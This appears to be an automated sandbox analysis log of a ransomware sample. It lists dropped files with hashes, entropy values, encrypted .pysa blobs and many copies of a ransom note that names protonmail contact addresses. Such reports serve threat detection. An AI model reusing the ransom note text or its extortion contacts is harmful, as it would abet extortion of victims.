                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Task Manager.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.055192583222839
                  Encrypted:false
                  SSDEEP:48:vSDyijYex7QLNwRkmi2jCMR7BQcVCKSNr3hKd3PpXN3zZZQyXZEzng+kqPzd1jUS:vqyFLSRkmiGycGNLcnXN3zRpyPnUj/Uh
                  MD5:D60FB52767B0D8FF0B9E31AD96605040
                  SHA1:72405B6EEE970055D5BD73010E0037B15C3A8FB6
                  SHA-256:736D89401DB1B5D2B06038269966D23D7E38D97EC7E3DC78E97137A096275F78
                  SHA-512:D66FA795639293D1233725E6330AEFCD46FAE7D3F32D1DB162295F5EBF7695F84E03DF07ED4FE1CCDA8D12C06CC03E0830945B6073EA00B50DF9FF8C3C4F24E8
                  Malicious:false
                  Preview: T=.r...>H..]L._3Zi.5=@..?.`D*8u....Ix.l...[........n.-...Y.o?..t...>..1..`..H.Zx.oDf.H.>k..A..0.sE.<V..,1......s^N3..=.|.d!"..+...e..X...u.1.o..bb..:/.[..P=.`..{.L....Z..7....z.P.Ylk,...]p#h........u..n.........................M.b./...!....<\("f"...O.{`.O.T..eF'WMd.{.hk...Va..n...w.5R}..}.0.]@..Z...k.....`.+4..{&..."..@x.....S.].`.. Mq5>t..:hG..h$..i'"..z;j.d%.!,....}.sFX.V.Je...>.N?.".k.c...(.....P..."...[i.?..W.....<.Z.k<)3N.W..9..0'.grp.)~......rP...4.Fh.a"!.....K...-[`..m..O.p..Y.........k.a.6....%|..\./iA...R...h.6...xK0.o....n..u.....-..&.._I.]5..wA..a0]..c...:..?...c2..2../G..v...LV['./..p..$..?..!..^.......!$w....a.....1....6."._..w..3aa...T....j.......8.+...17.5G.d.Bo.oM.*.h..a...rC.?.\4.<..U.].b@~.e.U.......nS9.R.?.f6X.....}...Rz.'...kY.S\.p.}z.Vu...|+...Ch.....<!1.t=...\........Vc....Ll.F.tOu....l...13.*]M...W....f..Ja.... ..h|.. .{...6h51.;..7M.F.-.hy....e.z|T.8(...G.fA.r|.{....+...l.-..=.R....J.d....j..|...@J..>.=.e=-[...]
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.789395737076546
                  Encrypted:false
                  SSDEEP:96:SGhXQtxgQVVcynnMRP2chRERO/QljELLuhbxIhxpXYM+0Q4/:SGhXmxgQ8yMZfQRcLuhVIhxpXYR4/
                  MD5:942CC9F256CE22498DA60374E67D89FC
                  SHA1:0924145B35E1269AB23BEC20492E1B6A0126D9A0
                  SHA-256:9A2A71BC112E50F1FEE7409D08AADAC2C1A4749ABD0E2F9AB2AF0BF26C018CE1
                  SHA-512:CB3D9C46AB4488FF0CA477600B9977DC83778F069FE33438D1B1F5207233ABEB879AE7F8FA1F2127DE12B6B6739BEDE4171563C10FA5129B1CDE94395691920A
                  Malicious:false
                  Preview: t......c..I&.....X....f.*....H^..#......=...o..>\ .6$..e]e.4"s...<XVu..].$.......V!.....C..m>u...~. :.bx..:.."....)h0f;,.Od(]m.D..E6J...o..m...}..SG....0.(..s......z..H...F.:...KE..J...g..k...8..`.2..9..Rt(u0.X..w.O...S..O2o...L(...9q.#.8.....%.U.2......|.+...~...l.....G.s..g.Z..{.. i:..0.Z,4.+..".V:.}z..i....d.5%H..\=H.A.f.H..uud..2.y..._.........+h...9......U.d*......L...4M.Q.vR.F....X...*....k..8.N..N.....q.9.TwlW`.....:..L._kj'..&.aMM....H...G?{x`Q.D/6F..a._....V......M.6.".6a. ....<Sl.~...V![W.G.u.......8Z....(@..T...2.T.......RP.a.Y.-k.'}1..J.J"...%.....*.K....8c\..s....O.(QwiD.....w....~.a..Iy.X.=..+u...V..U.E.-9.^..../%/.p...;..a#l'T....M..Z.y.gz.,M]..lv.....o..>..P'qQ..6....\.....~.!..@Y.&..Ox1>.....gW..I(.....'...G.r......D.s.>..Q....!..u.(.L..at..mW..] .k.e.........f....*.8..L*....g..h..5,j.yo.....<.....Z..I8...H...g.{..E.V....]..2=%.W.....Nj.j..[.l......L..{.i......I.)#.F...K.c...ImL..S...Z.C.~i.......\G..8c.....9...k.
                  C:\ProgramData\Microsoft\Windows\Start Menu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Templates\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Oracle\Java\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Oracle\Java\installcache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Oracle\Java\installcache\baseimagefam8.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):7098368
                  Entropy (8bit):7.999971620623606
                  Encrypted:true
                  SSDEEP:98304:rE3Hoh6HLgqNErEUi5VLk40A5V0UxM0K4NtYVV3okO9ZMa/57F6/Mfvw7UmUL1nG:rEHcqGi5VhV0J0K4HYVxOLMaxtvV/tbs
                  MD5:03C6AEE1777EAB883D755B36DC72A5A8
                  SHA1:83F216D4E079D51105AFE73CAB5111D88B2C1951
                  SHA-256:AE6493C60A5C811B4D67AF91E47B050C8E73B1F1885151A55EF0457F9BF8ADDE
                  SHA-512:A2AEDBE671C5EA13E2C7EBC08731DDF26B76F20FDD55A2D91890D00C2DB4C9B1A7AFF7B2E6258ADAB74172D76F1DA97EFC1968D3F1CD86523E3BCC62B07F7102
                  Malicious:true
                  Preview: O.Js.z.X...t7.."l..S.G..]k..<6.......b..C'F.VG..w..Q.+s...q....Q.n.qGa...........1.|...+...U5..'B:.t."...+.rpAz.n......((..i....1../.........g.M.8e.....09....S....0.{).N.3....a....LK,.....SB.r...].m.W....=.(b.FnK..+.c?>z..`......~..|........p.@}.7.Vq...`f.....G.IK.q.../.gE;...NG...lW|,>..jv..:\..4....~..XYt...>s..r..<......n.>....-.$.1.V..;.Y.q6...V...Fv..R..z.X r.Z\...%.r].L...<.B..03J.M.C.R....F.$u1.g..A....Mr..o...if..*"..k..p.,....r..hSP..pv?..v{.9`..e........E......C..]<M..9.I.....T..:.......<.m.zWV.Q....zlp.>....;.[........(.>.....Wo....r..........n.NF...Z.-.i............EN..h).t=.8...G...F..[..+.J%\P.q...>....Fs.;Y....!y..O.2v.C..6...>....e.e..@.:.P../.C.%......AKr.i ..s....F...|..%..W4D"......FI..=.HD<.....Jev.....@.W^...+.k..T...*9..fD..)~...,:.V6...{f....P.0'..Z..f....(.@}....{....B...O......L.!..gS.A..V...7...-..?K.......D.I....c8..U./.^....1+3.....g.(.O...5....,T...y.9..6o..@E..T.%i>Ds.....Lf..jzf.R3........d
                  C:\ProgramData\Oracle\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5634048
                  Entropy (8bit):7.999964412248206
                  Encrypted:true
                  SSDEEP:98304:c5iHJw5b2YPIkfh1Twaem1QfxlEQUbae9uyIukfgqsDbVAZBzO0/bKs8:LJw5b2yIgh1TDemaxYV9u9jfgqeCfbKr
                  MD5:E66771E55D8FE9D66DC912BE5A7B6D58
                  SHA1:A22F81ABBE748692F333FC4D917687557F240E27
                  SHA-256:328A7D31CCAD944D7C3645A04025B69753695087D23DDC014DE2AE6CC058A80E
                  SHA-512:94A2D8DC84CDB2AAE1D5522DC1D1317DED04B5BFF9C692AB09F986494B3569CC1715FDB1300B3C5868E5F3347A89BB35CB2F665BAF2BA8E44C614459B1EE5460
                  Malicious:true
                  Preview: PCr.@..2....SJ.=Rm..........j>....<?..n:..([.u...,.......U....H..3.5.qX....3ET..6m...`.m-J*..x..t.f....P..m.+.T..fP.>2#...o..!).......w.y...K<.z.F....t..:..:......p+L2.r.|ust+n76\........H.x.s.....%......N.../......<.Q....k...'zT./.id... ..u..Bs...-..D....k$R~..a.#I..|\J...X*..'.j..>...^...D...A._..{..k..9.~Z.\..D"....2X.....cee.R.W.Q...aq.. iL..IU.N.;.V.pT?$..,Z.&.].R1g...<..;......1.G.US..C6`.l).<X.c......O.....<..K....j.$......{...1.,..-v....u...Y.....P.$...uo...+..E.(..8.8.._...Fc.%V#..(;*.&..T3.....[*.....Wp.."{.EgJ)...Ep+-...:.....&d....7;....'...d3.!<...^..wm..[...t.h..$.........yR_.Z.....c.L.....@%......K......X+.[tw#c=7=...~."..n.-|n..!}..ZL|ZQ.I...n...5.]...6G..w.....S. ..'N_....6....A$.6..s..ab.......DL.V,,...a(...~...D...11.w.......y.....w.c.x."..:.O{...Kx.Z.J..)...k%..H.. eJh.e}..x.S....M...l{+...#?.A...}.h...V...B.o+........X.B(5l........wP...F......$bj.T..u..U\4k`../.Y....z[..a.u.+.(...n.cmy..9.Hso.t:...%.N........
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994605552116207
                  Encrypted:true
                  SSDEEP:3072:kU40+zz/gAGa/8MPYyFUt23D6V+DJDpQRSiGA/j5:940+bGA8MPdhmWniBGA/9
                  MD5:38DF5C58F939EB329473CCC063C0234D
                  SHA1:AC193949802394F541CBF94AA59145AA843A23FA
                  SHA-256:015B164FFCF253770A4B2DEF00493C411B450B260A68DEB2848CF221F62E5874
                  SHA-512:531380B966A6B08896414A1E557EDBDD8BE73BB833F77AFC953AD2F8BB559968FB720DE4101CC9DD929FE7CC8424BDACB550D81B2B93250E164303E26B0FCF6C
                  Malicious:true
                  Preview: 2...V..[G......Z.'...+is....j..]:.....u5.....\.7...c...\.;.....Mv.I...4 .y...5.x..aDP*..W.....eM..K)A..5...{.....%.j-. P...f.x0.........sx..C ...GL..Ze...ol..;.p......'.-..........g.(.O.O.....V........~.Cnn..D??.>U.C.<.........N.e]....<3.~Y7.b...,#$....\.>..%..8...:.A..<....\..J....XE.S".S..MX...........GB.c3ol>>;.d..k)S..{.\... Vc.!......y......zKxB.5.....*$.....H..T,...G!...D0...=^...H.rc.-9..>~}..+..w3L...../}g..|..H.....6.\dK...x..U..D.....wX`6.v.&N....w8.1..}.u..A\=......4....7......n'.....9..#9...p=...q..*...S.............l.../.._.- C....xRr..8.7l..= ..OJ......C"..3Q.\..G..!.T.L!.7<r...;$.R..-.o._$d~..BC.'..J6.y'...l.....X.g....2.j.#........Vuz.VF.%..,U..7#..s<*.+..g.9.V3".!R.t...3.o.W.......#R~$..%G.._.O...l....#.A^D.. /CYe#..g6...9'......$md...#.Q........i.0;s.t...X.].....B..Lsp{..Dg......AZ..dGKB....q.z..].9^+/..,...R^..._.(.2.-..t:+...g..g~.l.....l.>......[...D{.|.R.r...o..._x...5.....4d.7...M+`.$.*.1*R.kc....w.R..x.%..MR... ..
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
